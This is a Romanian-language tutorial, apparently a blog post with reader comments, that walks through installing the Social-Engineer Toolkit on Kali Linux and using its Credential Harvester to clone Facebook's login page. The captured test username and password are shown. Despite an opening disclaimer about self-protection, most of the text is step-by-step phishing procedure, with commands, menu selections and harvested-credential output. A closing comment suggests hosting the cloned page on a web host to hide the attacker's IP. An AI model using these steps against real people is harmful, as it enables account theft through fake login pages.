Acesta este un tutorial de bază, ce are ca scop consolidarea abilităților tale pe internet, cât și înțelegerea despre cum sunt create paginile web false, dar și cum te poți proteja de astfel de atacuri. Nu folosi aceste informații să ataci contul cuiva, deoarece riști să ai probleme.
Social Engineering Toolkit
Social engineering toolkit, dacă nu ai auzit de el până acum, nu exploatează vulnerabilitățile în mecanismul vreunui serviciu, ci exploatează slăbiciunile umane, cu privire la elementul de securitate. Social-Engineer Toolkit (SET) a fost creat de către fondatorul TrustedSec. Este o unealtă scrisă în Python, ce are ca scop penetrarea și testarea sistemelor de securitate, cu ajutorul ingineriei sociale. SET a fost prezentat la unele dintre cele mai mari conferințe, printre care Blackhat, DerbyCon, Defcon, și ShmooCon. Cu peste două milioane de descărcări, SET este standardul testelor de penetrare cu ajutorul ingineriei sociale, ce are tot suportul unei mari comunități din securitatea IT.
Kali Linux
sudo yum install git
sudo -sH
cd /opt
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd /opt/set
python setup.py install
sudo setoolkit
Se-toolkit
root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[—] The Social-Engineer Toolkit (SET) [—]
[—] Created by: David Kennedy (ReL1K) [—]
[—] Version: 4.3.9 [—]
[—] Codename: ‘Turbulence’ [—]
[—] Follow us on Twitter: @trustedsec [—]
[—] Follow me on Twitter: @dave_rel1k [—]
[—] Homepage: https://www.trustedsec.com [—]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
1 [enter] 2 [enter] 3 [enter] Explicație:
- Tasta 1 selectează atacuri ale ingineriei sociale. Lucrul acesta este evident, dacă citim opțiunile de la 1 la 9 (99 pentru a parăsi meniul)
- Tasta 2 selectează vectorii de atac ai unui website. Nu mai este chiar atât de evident. Modulul acesta reprezintă o metodă unică de atacuri web, ce au ca scop compromiterea victimei.
- Tasta 3 selectează Credential Harvester (Recoltatorul de date). Metoda Credential Harvester va utiliza clonarea web a unui site ce conține câmpurile cu username și parolă, apoi va ,,recolta” toate informațiile postate pe site.
Acum se va cere pagina pe care dorești să o clonezi. Scrie https://www.facebook.com/.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Demonstrație live
Pentru a mă asigura că această demonstrație nu este o repetare la ceea ce știi deja, am decis să clonez pagina de autentificare a celor de la facebook, în locul la homepage. Mai jos se vede și un screenshot.
Adăugând IP-ul în browser îmi arată pagina falsă de autentificare. De asemenea, se-toolkit înregistrează accesarea spunând că ip-ul 192.168.154.133 s-a logat pe data de 26 iulie 2017.
Acum o să introduc niște date în câmpurile de mai sus, date ce vor fi arătate de se-toolkit. Am introdus ca username ,,hackingwithkalilinux” și ca parolă ,,password”. Mai jos arată ce a înregistrat se-toolkit.
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Pe host am ca sistem de operare Windows 8
POSSIBLE USERNAME FIELD FOUND: email=windows
POSSIBLE PASSWORD FIELD FOUND: pass=anotherpassword
daca ai kali linux merge si cu setoolkit si dupa pui ce e in /var/www/html pe un ftp de webhosting si aia e…
Da, asta dacă nu dorești să faci public ip-ul tău.